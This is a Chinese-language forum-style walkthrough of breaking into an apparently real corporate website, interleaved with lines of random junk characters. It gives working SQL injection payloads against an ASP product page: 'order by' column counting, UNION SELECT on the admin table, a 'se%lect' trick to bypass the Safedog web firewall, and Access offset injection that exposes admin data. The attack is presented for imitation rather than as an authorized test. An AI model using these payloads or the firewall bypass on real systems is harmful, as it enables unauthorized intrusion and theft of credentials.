打开网站,一个企业站。
/ P1 p! r, r# x- p; F4 \7 k# \- W4 o& v3 x
+ }) F; F* B& q; B+ }, b
顺手加个admin
- i! H/ H; Z3 \* }" c/ B
( b1 f$ B+ ~ [7 {3 ?# M
: b1 ]7 v7 B1 ~7 Z6 ]默认后台。4 |. J) X! f6 j7 T* T- V8 u
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。$ v) S; w) i" w& g0 K3 t/ u
! s3 E r) H0 D6 Z! S* p, ?; h$ }
4 |0 L7 `; d2 w
0 `- o- s# }. Q; F所以就不用御剑扫了,待会直接封IP。# ?# D- A0 d* T3 B, _* r& x
7 l/ y0 p7 \* P6 }0 W* L用order by语句判断是否存在注入。
! W! b: `1 W6 P- Z9 chttp://www.xxx.com /product_show.asp?id=997 order by 1
5 y) A' X& L. O/ e9 ?. h) Ohttp://www.xxx.com /product_show.asp?id=997 order by 100
/ F) p3 |- M, H. T, F2 Y现在存在注入,经测试后发现是9个字段。
- u4 }- `) ^5 G4 |7 j
6 B$ M0 _% ^! q8 c接下来进行联合查询,猜是否存在admin表。
o5 A& P( S Q. T8 Jhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
3 }; {8 J2 h; ?# h" n" L& n) h( m8 ^% J* V( H4 _! N, j3 W
0 o; K! w2 p% [; X6 z* W4 A' m# |3 O
在select中间加个%,se%lect绕过安全狗。
' h# S6 s) D( F8 h/ @0 E5 s
# N& |; m1 X6 E- G' G" I- O+ ]6 d
$ I* I* n" Y7 D" \( ?. h$ w发现存在admin表,然后开始手工猜常用的字段。/ E: z$ x. @6 C: O4 t
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。: W, g* i5 R& ]5 S
. F3 i& R) R# N4 N) K突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。 l4 l5 f- i& ]( f
( [2 C+ h. _ n/ i; M, V. U科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。5 Q. x `4 A5 }& f2 b+ I; {- X
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
: k: a$ f8 B ~0 Y' g* d好了,敏感内容出显了。
3 k& t. u7 P6 V" x7 p' M, I8 N# x0 r: P2 T% q) _7 j
' W& O7 a/ p0 b3 {8 Q
# z, }- a; t9 h3 v! w& L0 a |